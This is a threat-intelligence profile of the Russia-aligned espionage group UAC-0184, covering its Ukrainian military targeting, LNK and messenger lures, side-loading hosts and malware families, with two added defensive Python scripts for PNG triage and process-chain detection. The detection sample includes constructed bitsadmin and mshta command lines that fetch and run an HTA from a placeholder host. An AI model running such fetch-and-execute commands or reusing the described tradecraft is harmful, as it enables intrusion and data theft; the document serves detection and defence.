UAC-0184
UAC-0184 is a Russia-aligned threat actor, also tracked as Hive0156, UNC5435, MB-0005, and MB-0007. Open-source reporting consistently describes the group as conducting cyber-espionage operations primarily against Ukrainian military and government entities, especially representatives of the Defense Forces of Ukraine and, in some cases, the Verkhovna Rada. CERT-UA reported increased activity during 2024 focused on gaining access to victims' computers in order to steal documents and messenger data.
The group relies heavily on social engineering and messenger-based delivery. Reported initial access vectors include popular messengers (Viber specifically) and dating websites, with lures themed around criminal or enforcement proceedings, combat videos, military administration, compensation issues, and acquaintance or romance pretexts. Multiple campaigns used ZIP archives containing malicious LNK files disguised as documents, spreadsheets, images, PDFs, DOCX, RTF, or XLSX files.
Observed tradecraft includes LNK-based execution, PowerShell downloader chains, use of bitsadmin and mshta to retrieve and execute HTA payloads, and staged delivery through ZIP archives. Reporting describes repeated DLL side-loading and search-order hijacking with legitimate software as cover, including Plane9 components, the Microsoft-signed VSLauncher.exe, the Bitdefender Endpoint Security deployer bddeploy.exe, a OneDrive-themed ClusterHub.exe, and executables associated with PassMark BurnInTest or PassMark Endpoint. Payload staging and reconstruction techniques mentioned in reporting include XOR decoding, AES-256-CBC decryption, gzip decompression, LZNT1 decompression, reflective loading of .NET assemblies, pseudo-PNG/IDAT chunk parsing, in-memory payload reconstruction, and module stomping.
Malware and tooling associated with UAC-0184 in reporting include HijackLoader/IDATLoader, SHADOWLADDER, GHOSTPULSE, Remcos RAT, ViottoKeylogger, XWorm, SIGTOP, and TUSC. CERT-UA states that SIGTOP and TUSC are used to steal and exfiltrate data from compromised systems, including Signal messages and contact data. Several analyses describe HijackLoader or related IDAT-based loaders ultimately deploying Remcos RAT, and other reporting links the actor to XWorm and Remcos in multi-stage attacks. The actor's stated targeting and objectives are intelligence gathering and theft of documents and messenger data from Ukrainian military- and government-related victims. Reporting also notes geofenced or gated payload delivery in some campaigns and repeated use of military-themed decoys matched to the victim set.
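The pseudo-PNG/IDAT staging mentioned above is a reason to triage image files found beside a side-loading host for structural oddities rather than trusting the extension. The Python below is an added example, not code from the page or from Mallory: it walks the chunk list, verifies each chunk CRC, checks whether the concatenated IDAT stream inflates to the size the IHDR header implies, and reports bytes trailing the IEND chunk. The three sample files are constructed inline, and the checks make no claim about any specific loader's container format; they only surface files that are not what a PNG decoder would expect.

```python
"""Structural triage of PNG files whose IDAT chunks may not hold image data.

Added example, not code from the page or from Mallory. Sample files are constructed.
"""
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
# Bytes per pixel for bit depth 8: greyscale, RGB, greyscale+alpha, RGBA.
BYTES_PER_PIXEL_8BIT = {0: 1, 2: 3, 4: 2, 6: 4}


def iter_chunks(data):
    """Yield (offset, type, body, crc_ok) for each chunk up to and including IEND."""
    if not data.startswith(PNG_SIG):
        raise ValueError("missing PNG signature")
    pos = len(PNG_SIG)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        body = data[pos + 8:pos + 8 + length]
        crc = data[pos + 8 + length:pos + 12 + length]
        if len(body) != length or len(crc) != 4:
            yield pos, ctype, body, False  # truncated chunk; stop walking
            return
        expected = struct.pack(">I", zlib.crc32(ctype + body) & 0xFFFFFFFF)
        yield pos, ctype, body, crc == expected
        pos += 12 + length
        if ctype == b"IEND":
            return


def analyze_png(data):
    """Return sorted anomaly tags; an empty list means the file is structurally sane."""
    findings = set()
    ihdr, idat, end = None, b"", len(data)
    for pos, ctype, body, crc_ok in iter_chunks(data):
        if not crc_ok:
            findings.add("bad_crc:" + ctype.decode("latin-1"))
        if ctype == b"IHDR" and len(body) == 13:
            ihdr = struct.unpack(">IIBBBBB", body)
        elif ctype == b"IDAT":
            idat += body
        elif ctype == b"IEND":
            end = pos + 12 + len(body)
    if ihdr is None:
        findings.add("missing_ihdr")
    if not idat:
        findings.add("missing_idat")
    else:
        try:
            raw = zlib.decompress(idat)
        except zlib.error:
            findings.add("idat_not_zlib")
        else:
            if ihdr is not None:
                width, height, depth, colour, _, _, interlace = ihdr
                bpp = BYTES_PER_PIXEL_8BIT.get(colour)
                if depth == 8 and interlace == 0 and bpp is not None:
                    # each non-interlaced scanline is one filter byte plus its pixels
                    if len(raw) != height * (1 + width * bpp):
                        findings.add("idat_size_mismatch")
    if end < len(data):
        findings.add("trailing_after_iend:%d" % (len(data) - end))
    return sorted(findings)


def make_chunk(ctype, body, corrupt_crc=False):
    """Build one chunk; corrupt_crc flips the CRC to simulate a patched chunk."""
    crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
    if corrupt_crc:
        crc ^= 0xFFFFFFFF
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)


IHDR_2X2_RGB = struct.pack(">IIBBBBB", 2, 2, 8, 2, 0, 0, 0)
# Constructed sample: a genuine 2x2 RGB image (filter byte 0 plus 6 pixel bytes per row).
VALID_PNG = (PNG_SIG + make_chunk(b"IHDR", IHDR_2X2_RGB)
             + make_chunk(b"IDAT", zlib.compress(b"\x00\xff\x00\x00\xff\x00\x00"
                                                 b"\x00\x00\xff\x00\x00\xff\x00"))
             + make_chunk(b"IEND", b""))
# Constructed sample: same header, but IDAT carries opaque bytes and data follows IEND.
PSEUDO_PNG = (PNG_SIG + make_chunk(b"IHDR", IHDR_2X2_RGB)
              + make_chunk(b"IDAT", b"\xde\xad\xbe\xef" + bytes(range(64)))
              + make_chunk(b"IEND", b"")
              + b"\x00" * 16)
# Constructed sample: valid image data whose IDAT chunk was rewritten without fixing the CRC.
PATCHED_PNG = (PNG_SIG + make_chunk(b"IHDR", IHDR_2X2_RGB)
               + make_chunk(b"IDAT", zlib.compress(b"\x00" * 14), corrupt_crc=True)
               + make_chunk(b"IEND", b""))

if __name__ == "__main__":
    for label, blob in (("valid", VALID_PNG), ("pseudo", PSEUDO_PNG), ("patched", PATCHED_PNG)):
        print(label, analyze_png(blob) or "no anomalies")
```

Run it over image files dropped alongside a suspicious side-loading host; a non-zlib IDAT stream or a size mismatch against IHDR is a strong triage signal, while a bad CRC or trailing data is weaker on its own, since some legitimate tools write sloppy files.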
Targeting
Who, where, and (when attributed) which flag flies behind the operation. Pulled from open-source reporting and Mallory's analyst review.
Who they target
Sectors the actor has been observed targeting.
- Military
Where they target
Geographies tied to known operations.
- 🇺🇦 Ukraine
Tradecraft
39 distinct techniques observed across reporting, grouped by tactic.
Associated malware families
12 malware families attributed to this actor across reporting.
7 additional families tracked in Mallory.
Observables
253 indicators attributed to this actor: domains, IPs, hashes, and other artifacts pulled from reporting.
Recent activity
20 sources tracked across advisories, community write-ups, and news.
- Conducting a Ukraine-themed malware delivery campaign using LNK files, temporary VBScript and PowerShell downloaders, a OneDrive-themed DLL sideload chain, HijackLoader/IDATLoader, and a final Remcos RAT payload.
- Targeting Ukrainian military-related entities using LNK lure files to deliver an executable associated with the legitimate PassMark BurnInTest program.
- Conducting a targeted malware campaign against Ukraine, particularly military-related targets and individuals connected to the Ukrainian Defence Forces, using social engineering lures, bitsadmin, HTA execution, DLL sideloading, and repurposed legitimate signed software for covert command-and-control.
- Conducting espionage-focused intrusions against Ukrainian military-related targets, using messenger and dating-platform social engineering, Ukraine-themed lures, staged malware delivery, HTA/LNK chains, DLL sideloading, and document/messenger data theft.
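The activity entries above and the profile's tradecraft summary repeat the same two behaviours: an LNK-launched shell that uses bitsadmin or mshta to fetch and run an HTA, and a legitimate signed binary executed from a user-writable folder as a side-loading host. The Python below is an added example, not code from the page or from Mallory, showing how both can be expressed as rules over process-creation telemetry. The events are constructed Sysmon-style records (host, pid, ppid, image, cmd), the URL is a placeholder, and the side-loading host names are the ones this page lists; both sets are meant to be extended.

```python
"""Detection rules for the LNK -> shell -> bitsadmin/mshta chain and for side-loading
hosts running from user-writable paths.

Added example, not code from the page or from Mallory. Events are constructed, not real telemetry.
"""
import ntpath
import re

SHELL_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}
DOWNLOAD_LOLBINS = {"bitsadmin.exe", "mshta.exe"}
# Legitimate signed executables that reporting names as side-loading hosts; extend as needed.
SIDELOAD_HOSTS = {"vslauncher.exe", "bddeploy.exe", "clusterhub.exe"}
USER_PATH = re.compile(r"[a-z]:\\users\\[^\\]+\\(appdata|downloads|desktop)\\", re.I)
URL = re.compile(r"https?://", re.I)

# Constructed sample events; placeholder.invalid is a reserved, non-routable name.
SAMPLE_EVENTS = [
    {"host": "WS1", "pid": 400, "ppid": 1, "image": r"C:\Windows\explorer.exe",
     "cmd": "explorer.exe"},
    # user opened an archive lure and double-clicked an LNK whose target is cmd.exe
    {"host": "WS1", "pid": 1200, "ppid": 400, "image": r"C:\Windows\System32\cmd.exe",
     "cmd": r"cmd.exe /c %TEMP%\stage.cmd"},
    {"host": "WS1", "pid": 1300, "ppid": 1200, "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmd": r"bitsadmin /transfer upd /download http://placeholder.invalid/a.hta C:\Users\u\AppData\Local\Temp\a.hta"},
    {"host": "WS1", "pid": 1400, "ppid": 1200, "image": r"C:\Windows\System32\mshta.exe",
     "cmd": r"mshta.exe C:\Users\u\AppData\Local\Temp\a.hta"},
    # benign administrative use of the same binary, not under an interactive shell
    {"host": "WS1", "pid": 2100, "ppid": 1, "image": r"C:\Windows\System32\services.exe",
     "cmd": "services.exe"},
    {"host": "WS1", "pid": 2200, "ppid": 2100, "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmd": "bitsadmin /list /allusers"},
    # signed side-loading host started from a temp folder versus its normal install path
    {"host": "WS1", "pid": 3000, "ppid": 400,
     "image": r"C:\Users\u\AppData\Local\Temp\setup\VSLauncher.exe", "cmd": "VSLauncher.exe"},
    {"host": "WS1", "pid": 3100, "ppid": 2100,
     "image": r"C:\Program Files\Bitdefender\Endpoint Security\bddeploy.exe", "cmd": "bddeploy.exe"},
]


def ancestry(index, event, max_depth=5):
    """Return lower-cased basenames of parent, grandparent, ... up to max_depth."""
    names, cur = [], event
    for _ in range(max_depth):
        cur = index.get((cur["host"], cur["ppid"]))
        if cur is None:
            break
        names.append(ntpath.basename(cur["image"]).lower())
    return names


def detect(events):
    """Return sorted (rule, pid) pairs for events matching either rule."""
    index = {(e["host"], e["pid"]): e for e in events}
    hits = []
    for e in events:
        name = ntpath.basename(e["image"]).lower()
        if name in DOWNLOAD_LOLBINS:
            chain = ancestry(index, e)
            # spawned by a script/shell host that itself descends from the user's explorer.exe
            from_interactive_shell = bool(chain) and chain[0] in SHELL_HOSTS and "explorer.exe" in chain[1:]
            # pulls from a URL, or runs content already staged under the user profile
            remote_or_user_content = bool(URL.search(e["cmd"]) or USER_PATH.search(e["cmd"]))
            if from_interactive_shell and remote_or_user_content:
                hits.append(("lolbin_download_exec", e["pid"]))
        if name in SIDELOAD_HOSTS and USER_PATH.match(e["image"]):
            hits.append(("signed_binary_from_user_path", e["pid"]))
    return sorted(hits)


if __name__ == "__main__":
    for rule, pid in detect(SAMPLE_EVENTS):
        print(rule, pid)
```

The ancestry walk keys on (host, pid), which is enough for a constructed sample but not for production telemetry, where pid reuse makes ProcessGuid/ParentProcessGuid the right join key. The second rule deliberately does not try to recognise the side-loaded DLL itself; the cheaper and more durable signal is a signed installer or launcher running from a path it was never installed to.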